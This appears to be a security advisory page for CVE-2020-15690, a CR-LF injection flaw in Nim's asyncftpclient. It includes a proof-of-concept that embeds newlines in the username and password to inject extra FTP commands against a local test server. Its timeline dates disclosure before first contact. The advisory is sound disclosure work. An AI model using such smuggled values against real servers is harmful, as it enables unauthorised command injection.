Skip to content

Latest commit

 

History

History
 
 

cve-2020-15690

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
Readme.md
Readme.md
 
 
crlf_inject.nim
crlf_inject.nim
 
 

Readme.md

title date cve vendor vendorUrl authors affectedVersions vulnClass
Nim - stdlib asyncftpd - Crlf Injection
2021-02-04 15:25:49 +0100
CVE-2020-15690
nim-lang
tintinweb
< 1.2.6
CWE-93

Vulnerability Note

Summary

In Nim before 1.2.6, the standard library asyncftpclient lacks a check for whether a message contains a newline character.

Details

Description

The nim standard library asyncftpclient is vulnerable to multiple CR-LF injections. An injection is possible if the attacker controls any argument that is passed to the remote server such as the username and password to newAsyncFtpClient.

The root cause of this issue is that the send(ftp, msg) allows msg to contain CR-LF control characters. An attacker that controls any unchecked input to send() can therefore inject arbitrary FTP commands.

proc send*(ftp: AsyncFtpClient, m: string): Future[TaintedString] {.async.} =
  ## Send a message to the server, and wait for a primary reply.
  ## ``\c\L`` is added for you.
  ##
  ## **Note:** The server may return multiple lines of coded replies.
  await ftp.csock.send(m & "\c\L")
  return await ftp.expectReply()

Proof of Concept

Note: nim c -r -d:ssl crlf_inject.nim

  • Injecting FTP commands via user and pass
import asyncdispatch, asyncftpclient
proc main() {.async.} =
  var ftp = newAsyncFtpClient("localhost", user = "test\nINJECTED_LINE test test", pass = "test\nINJECTED_LINE test test 2")
  await ftp.connect()
  echo("Connected")
waitFor(main())

Output:

⇒ nim c -r -d:ssl  crlf_inject.nim
...
Hint: 104717 LOC; 1.030 sec; 113.309MiB peakmem; Debug build; proj: /Users/tintin/workspace/nim/test/issues/asyncftpclient/crlf_inject.nim; out: /Users/tintin/workspace/nim/test/issues/asyncftpclient/crlf_inject [SuccessX]
Hint: /Users/tintin/workspace/nim/test/issues/asyncftpclient/crlf_inject  [Exec]
Connected

⇒  nc -l 21
220 fake ftp
USER test
INJECTED_LINE test test
230 Hi test, thanks for injecting a line...
PASS test
INJECTED_LINE test test 2
230 thx for injecting another line...

Proposed Fix

  • properly validate user input
  • raise an exception if CR or LF if found in the msg passed to send()

Vendor Response

Vendor response: fixed in 1.2.6

Timeline

JUL/13/2020 - contact dom96@telegram; provided details, PoC
FEB/04/2020 - public disclosure

References